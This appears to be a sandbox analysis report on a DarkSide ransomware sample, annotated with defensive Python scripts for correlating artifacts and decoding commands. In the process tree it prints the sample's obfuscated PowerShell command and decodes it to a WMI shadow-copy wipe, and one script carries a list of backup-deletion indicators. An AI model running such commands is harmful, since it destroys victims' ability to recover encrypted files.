Analysis
max time kernel: 121s
max time network: 147s
platform: windows10_x64
resource: win10-en-20211208
submitted: 25-01-2022 23:29
Static task: static1
Behavioral task: behavioral1 (Sample: mal.exe, Resource: win7-en-20211208)
Behavioral task: behavioral2 (Sample: mal.exe, Resource: win10-en-20211208; the run shown below)
General
Target: mal.exe
Size: 512KB
MD5: 650d18a78f30302a1e10f664a0d2cb0a
SHA1: c318776aefbd0156de1e6f7bba216d87e27c6341
SHA256: 2c7d10f64dc39ea9bd6f18d9d1e1204f0c62324e8da148354d557bba17e3c615
SHA512: cb209a8c381e99c8adf49a2ea1caa0732da0ad5891b7b244dcf8540d677a03b7e912b4e121c25440a5bbf855a112b8c0061f0974922154c6bdf11eb176bd3c57
Malware Config
Extracted from: C:\README.82ee2099.TXT (the dropped ransom note)
Family: darkside
URL: http://darksidfqzcuhtk2.onion/GM0CG8TNZ83ZPUD15TL76BLDCG0ST24TR6NXG1J2AVXSKF8KS4KFIIN2ON5GRWD4
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 19 IoCs
Ransomware generally changes the extension on encrypted files.
Processes: mal.exe (every entry below was performed by mal.exe)
description | ioc
File opened for modification | C:\Users\Admin\Pictures\UnregisterRestore.tiff
File renamed | C:\Users\Admin\Pictures\ConfirmDebug.raw => C:\Users\Admin\Pictures\ConfirmDebug.raw.82ee2099
File renamed | C:\Users\Admin\Pictures\ConfirmSwitch.raw => C:\Users\Admin\Pictures\ConfirmSwitch.raw.82ee2099
File opened for modification | C:\Users\Admin\Pictures\CopyUndo.tiff
File renamed | C:\Users\Admin\Pictures\CopyUndo.tiff => C:\Users\Admin\Pictures\CopyUndo.tiff.82ee2099
File renamed | C:\Users\Admin\Pictures\PingDismount.raw => C:\Users\Admin\Pictures\PingDismount.raw.82ee2099
File opened for modification | C:\Users\Admin\Pictures\ResumeSet.crw.82ee2099
File renamed | C:\Users\Admin\Pictures\UnregisterRestore.tiff => C:\Users\Admin\Pictures\UnregisterRestore.tiff.82ee2099
File renamed | C:\Users\Admin\Pictures\CheckpointPublish.tif => C:\Users\Admin\Pictures\CheckpointPublish.tif.82ee2099
File opened for modification | C:\Users\Admin\Pictures\ConfirmDebug.raw.82ee2099
File opened for modification | C:\Users\Admin\Pictures\ConfirmSwitch.raw.82ee2099
File opened for modification | C:\Users\Admin\Pictures\DebugTrace.tiff
File opened for modification | C:\Users\Admin\Pictures\DebugTrace.tiff.82ee2099
File opened for modification | C:\Users\Admin\Pictures\CheckpointPublish.tif.82ee2099
File renamed | C:\Users\Admin\Pictures\DebugTrace.tiff => C:\Users\Admin\Pictures\DebugTrace.tiff.82ee2099
File renamed | C:\Users\Admin\Pictures\ResumeSet.crw => C:\Users\Admin\Pictures\ResumeSet.crw.82ee2099
File opened for modification | C:\Users\Admin\Pictures\CopyUndo.tiff.82ee2099
File opened for modification | C:\Users\Admin\Pictures\PingDismount.raw.82ee2099
File opened for modification | C:\Users\Admin\Pictures\UnregisterRestore.tiff.82ee2099
Every rename appends the same suffix, .82ee2099, to the original file name; the original extension is kept, so the victim can still see which files were hit.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes: mal.exe
description | ioc
Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\82ee2099.BMP"
Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\82ee2099.BMP"
(The value is written twice, once under each capitalisation of the value name.)
-
Modifies Control Panel 1 IoCs
Processes: mal.exe
description | ioc
Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallpaperStyle = "10"
-
Modifies registry class 5 IoCs
Processes: mal.exe
description | ioc
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099\ = "82ee2099"
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099\DefaultIcon
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\82ee2099.ico"
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099
Together these register .82ee2099 as a file type (ProgID 82ee2099) whose DefaultIcon is the dropped 82ee2099.ico, so every encrypted file shows the ransomware's icon in Explorer.
-
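The same 8-hex-character token, 82ee2099, appears in the appended extension, the ransom note name, the wallpaper, the icon and the registry class above. The script below is an added example, not part of this report: it recovers the appended extension from the rename events in the table (copied from the report, and labelled as such) and checks that the other artifacts carry the same token. The parsing logic and the "at least three files" threshold are the editor's own choices.

```python
"""
Correlate the per-run token that this DarkSide sample stamps on every artifact.
Added example: the event strings are copied from the sandbox report, the logic is
the editor's own and is not part of the report or of the malware.
"""
import re
from collections import Counter
from typing import Optional

# Rename events from the "Modifies extensions of user files" table (constructed list,
# copied from the report; only the "old => new" renames, not the open-for-modification rows).
RENAME_EVENTS = [
    r"C:\Users\Admin\Pictures\ConfirmDebug.raw => C:\Users\Admin\Pictures\ConfirmDebug.raw.82ee2099",
    r"C:\Users\Admin\Pictures\ConfirmSwitch.raw => C:\Users\Admin\Pictures\ConfirmSwitch.raw.82ee2099",
    r"C:\Users\Admin\Pictures\CopyUndo.tiff => C:\Users\Admin\Pictures\CopyUndo.tiff.82ee2099",
    r"C:\Users\Admin\Pictures\PingDismount.raw => C:\Users\Admin\Pictures\PingDismount.raw.82ee2099",
    r"C:\Users\Admin\Pictures\UnregisterRestore.tiff => C:\Users\Admin\Pictures\UnregisterRestore.tiff.82ee2099",
    r"C:\Users\Admin\Pictures\CheckpointPublish.tif => C:\Users\Admin\Pictures\CheckpointPublish.tif.82ee2099",
    r"C:\Users\Admin\Pictures\DebugTrace.tiff => C:\Users\Admin\Pictures\DebugTrace.tiff.82ee2099",
    r"C:\Users\Admin\Pictures\ResumeSet.crw => C:\Users\Admin\Pictures\ResumeSet.crw.82ee2099",
]

# Other artifacts from the report that should carry the same token (paths copied from the report).
OTHER_ARTIFACTS = {
    "ransom_note": r"C:\README.82ee2099.TXT",
    "wallpaper": r"C:\ProgramData\82ee2099.BMP",
    "icon": r"C:\Users\Admin\AppData\Local\82ee2099.ico",
    "registry_ext_class": r"\REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099",
    "registry_progid": r"\REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099",
}


def appended_suffix(event: str) -> Optional[str]:
    """Return the suffix appended by an 'old => new' rename, or None when the new
    name is not simply old name + suffix (an ordinary rename, not an extension stamp)."""
    old, sep, new = event.partition(" => ")
    if not sep or not new.startswith(old):
        return None
    return new[len(old):]


def ransomware_extension(events) -> Optional[str]:
    """Pick the suffix appended in the most renames; require it to look like an
    extension ('.' + alphanumerics) shared by at least 3 files so that a single
    unrelated rename does not trigger."""
    suffixes = Counter(s for s in map(appended_suffix, events) if s)
    if not suffixes:
        return None
    ext, count = suffixes.most_common(1)[0]
    if count < 3 or not re.fullmatch(r"\.[A-Za-z0-9]+", ext):
        return None
    return ext


def correlate(ext: str, artifacts: dict) -> dict:
    """Map artifact name -> True when the bare token (extension without its dot)
    appears as a whole name component of that artifact's path."""
    token = ext.lstrip(".")
    pat = re.compile(r"(?<![A-Za-z0-9])" + re.escape(token) + r"(?![A-Za-z0-9])")
    return {name: bool(pat.search(path)) for name, path in artifacts.items()}


if __name__ == "__main__":
    ext = ransomware_extension(RENAME_EVENTS)
    print("appended extension:", ext)
    for name, hit in correlate(ext, OTHER_ARTIFACTS).items():
        print(f"{name:20s} {'matches' if hit else 'no match'}")
```

Because the token is per run rather than per family, a detection built on it should key on the pattern (one suffix appended to many files within seconds, then the same token reused in a README.<token>.TXT, a <token>.BMP wallpaper and an HKLM\SOFTWARE\Classes\.<token> key) rather than on the literal string 82ee2099.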
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes: powershell.exe, mal.exe
pid | process
2144 | powershell.exe (3 events)
2720 | mal.exe (2 events)
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes: mal.exe, powershell.exe, vssvc.exe
process (pid) | tokens enabled
mal.exe (2720) | SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
powershell.exe (2144) | SeDebugPrivilege
vssvc.exe (1800) | SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
The four entries shown only as numbers (33 to 36) are privileges the sandbox did not resolve to a name. The sample enables essentially every privilege available to the admin token at once, including SeBackupPrivilege, SeRestorePrivilege and SeTakeOwnershipPrivilege, which let it open and overwrite files regardless of their ACLs.
-
Suspicious use of WriteProcessMemory 2 IoCs
Processes: mal.exe
description | pid | process | target process
PID 2720 wrote to memory of 2144 | 2720 | mal.exe | powershell.exe
PID 2720 wrote to memory of 2144 | 2720 | mal.exe | powershell.exe
Both writes target the sample's own PowerShell child at the moment it is spawned; the report shows no write into an unrelated process, so this is the parent/child handoff rather than injection into a third process.
Processes
-
C:\Users\Admin\AppData\Local\Temp\mal.exe (PID 2720)
command line: "C:\Users\Admin\AppData\Local\Temp\mal.exe"
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
  child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2144)
  command line: powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
  The loop rebuilds a string one hex-encoded byte at a time and hands it to iex. The 62 bytes decode to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
  That is the DarkSide shadow-copy wipe: every volume shadow copy is deleted through WMI so that encrypted files cannot be restored from a snapshot, with the execution policy bypassed (-ep bypass) and the real command hidden from a plain string match.
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exe (PID 1800)
command line: C:\Windows\system32\vssvc.exe
The Volume Shadow Copy service, which services the Win32_ShadowCopy deletion issued by the PowerShell child.
- Suspicious use of AdjustPrivilegeToken
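To check the decoding claim above without running the sample, the script below is an added example (not part of the report and not the malware's code): it emulates the `(0..N) ... Substring(2*$_,2)` loop on the command line copied from the process tree, then runs the decoded text through a small, editor-written list of shadow-copy deletion indicators. The regular expressions and the indicator list are the editor's own assumptions about what such a detection should cover.

```python
"""
Decode the hex-looped PowerShell child from the process tree and classify it.
Added example: the command line is copied from the sandbox report; the decoder,
the regexes and the indicator list are the editor's own.
"""
import re
from typing import Optional

# Command line of PID 2144 exactly as shown in the report's process tree.
CMDLINE = (
    "powershell -ep bypass -c \"(0..61)|%{$s+=[char][byte]('0x'+"
    "'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20"
    "466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'"
    ".Substring(2*$_,2))};iex $s\""
)

# Shape of the obfuscation: a (0..N) range feeding [char][byte]('0x'+'<hex>'.Substring(2*$_,2)).
HEX_LOOP = re.compile(
    r"\(0\.\.(?P<last>\d+)\).*?'(?P<hex>[0-9A-Fa-f]{4,})'\.Substring\(2\*\$_,2\)",
    re.DOTALL,
)

# Editor-chosen indicators of shadow-copy destruction (WMI, vssadmin, wmic, wbadmin).
SHADOW_COPY_INDICATORS = [
    r"Win32_ShadowCopy.*\.Delete\(",
    r"vssadmin(\.exe)?\s+delete\s+shadows",
    r"wmic(\.exe)?\s+shadowcopy\s+delete",
    r"wbadmin(\.exe)?\s+delete\s+catalog",
]


def decode_hex_loop(cmdline: str) -> Optional[str]:
    """Emulate the loop: byte i is hex[2*i:2*i+2] for i in 0..last inclusive.
    Bytes past the range are dropped, just as PowerShell drops them (here the
    63rd byte, a trailing space, is never read)."""
    m = HEX_LOOP.search(cmdline)
    if not m:
        return None
    last, hexstr = int(m.group("last")), m.group("hex")
    out = []
    for i in range(last + 1):
        chunk = hexstr[2 * i: 2 * i + 2]
        if len(chunk) < 2:          # range overran the string; PowerShell would throw here
            break
        out.append(chr(int(chunk, 16)))
    return "".join(out)


def shadow_copy_deletion(script: str) -> bool:
    """True when the (decoded) script matches any shadow-copy deletion indicator."""
    return any(re.search(p, script, re.IGNORECASE) for p in SHADOW_COPY_INDICATORS)


def analyze(cmdline: str) -> dict:
    """Decode if hex-looped, otherwise inspect the plain command line."""
    decoded = decode_hex_loop(cmdline)
    if decoded is None:
        decoded = cmdline
    return {
        "decoded": decoded,
        "exec_policy_bypass": bool(re.search(r"-e(xecutionpolicy|p)?\s+bypass", cmdline, re.I)),
        "invokes_iex": bool(re.search(r"\biex\b|Invoke-Expression", cmdline, re.I)),
        "shadow_copy_deletion": shadow_copy_deletion(decoded),
    }


if __name__ == "__main__":
    for key, value in analyze(CMDLINE).items():
        print(f"{key:22s} {value}")
```

The decoder handles only this one loop shape; a hunt rule should also key on the surrounding behaviour that the report records independently of the encoding (powershell.exe spawned by an unsigned binary with -ep bypass and iex, followed by vssvc.exe enabling SeBackupPrivilege), since the next build can swap the hex loop for Base64 or a format string.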
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5: ea6243fdb2bfcca2211884b0a21a0afc
SHA1: 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA256: 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512: 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5: c11eefc391596abf20be57025705306b
SHA1: 755175fa7bd43f51247f871f8acc614eb543982b
SHA256: ffc70159e477fc6ffd9df2563501347fe991a7beb753700c454f1e8f6ad5ff9b
SHA512: 8778fa98cbe48aca42d553db4a1c5f030f8000e6fbfa3acfb7670f0010999e834a4bcc064b0f3741609928c3caf283e61f9e7674e2fb5a5c6bb292c7b4081ba5
(Both files are artifacts of powershell.exe starting, not payloads dropped by the sample.)
-
Memory dumps (pid-index-start-end)
memory/2144-128-0x000002F89B330000-0x000002F89B332000-memory.dmp | Filesize: 8KB
memory/2144-129-0x000002F89B333000-0x000002F89B335000-memory.dmp | Filesize: 8KB
memory/2144-130-0x000002F89C750000-0x000002F89C772000-memory.dmp | Filesize: 136KB
memory/2144-134-0x000002F89D240000-0x000002F89D2B6000-memory.dmp | Filesize: 472KB
memory/2144-147-0x000002F89B336000-0x000002F89B338000-memory.dmp | Filesize: 8KB
memory/2720-118-0x0000000000400000-0x000000000083B000-memory.dmp | Filesize: 4.2MB
memory/2720-119-0x0000000000C10000-0x0000000000C2C000-memory.dmp | Filesize: 112KB
memory/2720-120-0x0000000000030000-0x0000000000040000-memory.dmp | Filesize: 64KB
memory/2720-121-0x0000000000400000-0x000000000083B000-memory.dmp | Filesize: 4.2MB
The two 4.2MB dumps of PID 2720 cover the same image range (0x400000 to 0x83B000) at different points in the run; comparing them is the quickest way to see what the 512KB on-disk sample unpacks in memory.